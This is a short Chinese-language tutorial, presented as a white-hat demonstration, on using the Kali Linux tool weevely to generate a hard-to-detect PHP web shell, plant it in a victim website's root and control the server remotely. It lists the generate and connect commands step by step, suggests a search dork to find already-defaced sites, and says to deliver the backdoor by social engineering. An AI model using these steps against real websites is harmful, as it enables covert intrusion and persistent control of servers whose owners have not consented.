网络安全工程师演示:白帽黑客使用Kali Linux“中国菜刀”weevely网站渗透技巧
一、背景介绍
生成和管理很难检测到的PHP木马,Weevely是一个隐形的PHP网页的外壳,模拟的远程连接。这是一个Web应用程序后开发的重要工具,可用于像一个隐藏的后门,作为一个有用的远程控制台更换管理网络帐户,即使托管在免费托管服务。只是生成并上传“服务器”目标Web服务器上的PHP代码,Weevely客户端在本地运行shell命令传输。
那么如何利用weevely控制目标主机呢?接下来让我们一起学习!
二、资源装备
1.安装好 Kali Linux 的虚拟机一台
2.受害者主机一个;
3.整装待发的小白一个。
三、渗透测试
3.1 利用搜索引擎检索已经被黑客挂黑页的网站,如下图所示。
谷歌语法:intltle:hacked by
3.2 在攻击者主机打开Kali 中的中国菜刀软件(weevely),如下图所示。
命令:weevely
3.3 在受害者主机安装网站环境,这里以phpstudy集成环境举例,如下图所示。
步骤:百度检索phpstudy
下载网址: https://www.xp.cn/download.html
安装教程: https://www.php.cn/php-weizijiaocheng-396668.html
3.4 利用weevely工具在攻击者主机生成shell.php后门文件,如下图所示。
命令:weevely generate admin /tmp/shell.php
3.5 查看生成的shell.php文件内容,如下图所示。
命令:cat /tmp/shell.php
3.6 将生成的后门文件利用社会工程学导入受害者网站根目录,如下图所示。
3.7 查看受害者主机的IP地址,如下图所示。
命令:ipconfig
3.8 连接后门,如下图所示。
命令:weevely http://192.168.0.103/shell.php admin
3.9 查看拿下的网站目录,如下图所示。
命令:dir